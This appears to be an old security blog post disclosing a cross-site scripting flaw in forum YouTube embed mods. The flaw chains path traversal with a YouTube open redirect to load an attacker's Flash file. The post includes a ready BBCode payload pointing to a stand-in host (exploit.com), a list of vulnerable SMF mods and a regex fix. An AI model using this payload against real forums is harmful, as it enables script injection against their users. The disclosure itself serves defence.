Well, I want to explain first, this was not my idea, someone at irc.irchighway.net/#slackers discussed about this a while ago, but he wasn't able to find a redirection URL at youtube.
A couple of days ago I found such URL, and now I can't remember who was he, please if you read this, send me an e-mail to modify this post for the credits.
[[ UPDATE ]] kuza55 found out that Kyran was the one to come with the idea [[ /UPDATE ]]
Well, discusing this with the guys at w4ck1ng it appears that the vulnerability is rather complex to understand.
- First, we know that if we can embed a flash movie into a site, we can make XSS attacks, by means of getURL("javascript:code_here");
- Second, we know that we cant embed any arbitrary movie into any forum (at least not by default).
- Third, we know there are thousands of forums that have Youtube mods instaled, so their users can link to movies, and watch them without leaving the site.
- Fourth, the mods for youtube (at least the ones I found) have no regular expressions for validating that the video linked is valid, and they do:
http://www.youtube.com/v/{param_here}thinking, that in such way an attacker wont be able to change the domain. - Fifth, Youtube doesn't have any visible redirection URL that forwards to an arbitrary site, so if you found a redirection page, you could do..
http://www.youtube.com/v/../redirection?page=http://your.swf.exploit/ - Sixth, the redirection page inside youtube is http://www.youtube.com/confirm_email?next=http://new.url/
- Seventh, using step 4, 5 and 6 the exploit is like this:
[youtube=1,1]../confirm_email?next=http://exploit.com/swf[/youtube]
^[a-zA-Z0-9_]{11}$
(like the phpBB mod does)[EDIT]
List of SMF vulnerable mod's:
- http://www.simplemachines.org/community/index.php?topic=107067.0
- http://www.simplemachines.org/community/index.php?topic=165018.0
- http://www.simplemachines.org/community/index.php?topic=139271.0
Not vulnerable:
Unsafe IPB youtube mod instalation:
[/EDIT]
